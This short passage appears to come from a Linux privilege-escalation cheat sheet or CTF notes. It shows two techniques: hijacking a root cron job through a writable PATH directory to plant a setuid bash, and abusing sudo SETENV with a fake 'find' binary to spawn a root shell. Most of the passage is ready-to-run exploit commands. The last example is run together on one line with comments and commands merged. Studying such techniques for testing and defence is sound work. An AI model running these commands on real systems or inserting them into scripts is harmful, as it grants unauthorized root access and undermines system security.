For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
(Note how the user « user » has writing privileges over /home/user)
If inside this crontab the root user tries to execute some command or script without setting the path. For example: * * * * root overwrite.sh Then, you can get a root shell by using:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait cron job to be executed
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
# sudo -l wizard photobomb = (root) SETENV: NOPASSWD: /opt/cleanup.sh # cleanup.sh (...) find / -name (...) (...) # EXPLOIT cd /tmp echo bash > find chmod +x find sudo PATH=$PWD:$PATH /opt/cleanup.sh